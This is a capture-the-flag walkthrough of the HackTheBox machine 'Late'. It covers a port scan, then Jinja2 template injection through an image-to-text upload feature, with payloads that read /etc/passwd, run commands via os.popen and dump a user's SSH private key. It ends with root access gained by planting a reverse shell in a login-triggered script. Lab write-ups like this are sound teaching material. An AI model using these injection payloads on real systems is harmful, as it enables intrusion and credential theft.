2022-07-30
# HackTheBox - Late
Nmap scan report for
Host is up (0.14s latency).
Not shown: 65533 closed ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 1575FDF0E164C3DB0739CF05D9315BDF
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
## PORT 80 (HTTP)
On port 80 it's nginx hosting a web page having a domain `images.late.htb`
<img src="https://i.imgur.com/evcrfB1.png"/>
<img src="https://i.imgur.com/8mcfyy0.png"/>
Let's add the domain name in `/etc/hosts` file
<img src="https://i.imgur.com/flHcBKo.png"/>
<img src="https://i.imgur.com/wv1EgOh.png"/>
So here let's try uploading an image with a text and see if it actually converts the image into text form
<img src="https://i.imgur.com/PodDzYJ.png"/>
I grabbed this image for the test and after uploading, we get a file name `results.txt` with the image text
<img src="https://i.imgur.com/sVFID89.png"/>
## Foothold
We can now try to test for SSTI since this a flask application as the main page says, jinja2 is normally used for templates, we can try `{{7*'7'}}` and if it returns 7777777 then it's vulnerable to SSTI and is using jinja2 else it would return 49 if it would be using twig
So to make this work, we can take a screenshot of `{{7*'7'}}` on a text editor and save it as an image
<img src="https://i.imgur.com/YSromP7.png"/>
<img src="https://i.imgur.com/rX25Rdv.png"/>
It works, now it's time to test for command execution. We can use this payload to test if we can can read files
<img src="https://i.imgur.com/jWl1y7w.png"/>
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
After uploading this we get the `/etc/passwd` file
<img src="https://i.imgur.com/ZCqQx2L.png"/>
Now we can't get a reverse shell from where even tho we can execute commands with
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
Which would return us
<img src="https://i.imgur.com/J0BujLE.png"/>
Instead we can grab the ssh key for `svc_acc`
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat /home/svc_acc/.ssh/id_rsa').read() }}
<img src="https://i.imgur.com/ZMbjm7x.png"/>
<img src="https://i.imgur.com/9enwoWJ.png"/>
After getting shell, we can check what's running in the background for that we can use `pspy`
<img src="https://i.imgur.com/3hstUUU.png"/>
<img src="https://i.imgur.com/ZkOhugq.png"/>
On looking at the script it looks like a normal ssh alert which is sent to root'users mail but if we notice in pspy that script is being executed whenever we login through ssh
<img src="https://i.imgur.com/XpvyPlJ.png"/>
So we just need to add shell commands to it and it will be executed, so I'll be adding a bash reverse shell
<img src="https://i.imgur.com/J22tBZ6.png"/>
After logging in back the script will be executed and we'll have our reverse shell as root user
<img src="https://i.imgur.com/K0f7Hr7.png"/>
